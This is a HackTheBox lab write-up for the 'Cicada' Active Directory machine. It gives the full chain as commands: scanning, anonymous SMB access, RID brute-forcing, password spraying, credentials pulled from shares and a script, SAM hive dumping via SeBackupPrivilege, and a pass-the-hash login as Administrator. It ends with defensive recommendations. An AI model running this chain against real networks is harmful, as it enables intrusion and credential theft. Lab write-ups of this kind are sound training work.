htb-writeups

Cicada HTB Walkthrough

A comprehensive penetration testing walkthrough for the Cicada machine from HackTheBox.

Overview

Cicada is a medium-difficulty Windows Active Directory machine that involves comprehensive enumeration, password reuse exploitation, and privilege escalation through backup privileges.

Target IP: 10.129.11.232
Domain: CICADA-DC.cicada.htb

Reconnaissance

Network Scanning

Initial port discovery using aggressive Nmap scan:

export target=10.129.11.232
sudo nmap -p- --min-rate 5000 -sT -vvv $target

Discovered Open Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 50845

Service Enumeration

Comprehensive service version detection and script scanning:

sudo nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,50845 -T4 $target

Key Services Identified:

• Port 53: DNS Service
• Port 88: Kerberos Authentication
• Port 139/445: SMB File Sharing
• Port 389/636: LDAP/LDAPS
• Port 5985: WinRM (Windows Remote Management)

SMB Enumeration

Anonymous SMB share enumeration revealed accessible shares:

smbclient -N -L //10.129.11.232/

Available Shares:

• ADMIN$ (Remote Admin)
• C$ (Default share)
• DEV (Development Share)
• HR (Human Resources Share)
• IPC$ (Remote IPC)
• NETLOGON (Logon server share)
• SYSVOL (Logon server share)

Initial Access

HR Share Examination

The HR share contained a welcome notice with default credentials:

smbclient //10.129.11.232/HR
cat "Notice from HR.txt"

Credentials Discovered:
Default password pattern: Cicada$M6Corpb*@Lp#nZp!8

User Enumeration

RID brute-forcing to discover domain users:

crackmapexec smb $target -u 'guest' -p '' --rid-brute 2>/dev/null

Discovered Domain Users:

• Administrator
• Guest
• krbtgt
• CICADA-DC$
• john.smoulder
• sarah.dantelia
• michael.wrightson
• david.orelious
• emily.oscars

Credential Spraying

Password spraying with discovered default credentials:

crackmapexec smb $target -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success 2>/dev/null

Valid Credentials Found:
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

Lateral Movement

Additional Credential Discovery

Further enumeration revealed another user’s credentials:

crackmapexec smb $target -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users 2>/dev/null

Additional Credentials:
david.orelious:aRt$Lp#7t*VQ!3

DEV Share Access

Accessing the DEV share with David’s credentials:

smbclient -U 'david.orelious%aRt$Lp#7t*VQ!3' //10.129.11.232/DEV

Discovered File: Backup_script.ps1

Backup Script Analysis

The PowerShell backup script contained hardcoded credentials:

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force

New Credentials: emily.oscars:Q!3@Lp#M6b*7t*Vt

WinRM Access

Testing WinRM access with Emily’s credentials:

crackmapexec winrm $target -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' 2>/dev/null
evil-winrm -i $target -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

User Flag: 3692d04e5db2d48dadce05ee6a469235

Privilege Escalation

Privilege Assessment

Checking user privileges:

whoami /priv

Key Privileges:

• SeBackupPrivilege (Enabled)
• SeRestorePrivilege (Enabled)
• SeShutdownPrivilege (Enabled)
• SeChangeNotifyPrivilege (Enabled)
• SeIncreaseWorkingSetPrivilege (Enabled)

SAM Database Extraction

Utilizing SeBackupPrivilege to extract SAM and SYSTEM hives:

reg save HKLM\SAM C:\Users\emily.oscars.CICADA\Documents\sam
reg save HKLM\SYSTEM C:\Users\emily.oscars.CICADA\Documents\SYSTEM

Credential Extraction

Using Impacket to extract password hashes:

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Administrator NTLM Hash: 2b87e7c93a3e8a0ea4a581937016f341

Administrator Access

Pass-the-hash attack using Evil-WinRM:

evil-winrm -i $target -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'

Root Flag: ff17e2ce0fc4b8e1f0fb7947aa0dd60a

Conclusion

The Cicada machine demonstrated several critical security issues:

1. Information Disclosure: Default passwords in HR documentation
2. Password Reuse: Multiple users sharing similar password patterns
3. Hardcoded Credentials: Sensitive credentials in backup scripts
4. Excessive Privileges: Backup privileges granted to standard users
5. Weak Access Controls: Insufficient restriction of sensitive operations

Security Recommendations

• Implement proper password policies with complexity requirements
• Avoid hardcoded credentials in scripts and configuration files
• Follow principle of least privilege for user accounts
• Regularly audit and monitor privileged operations
• Implement credential management solutions
• Conduct regular security awareness training

---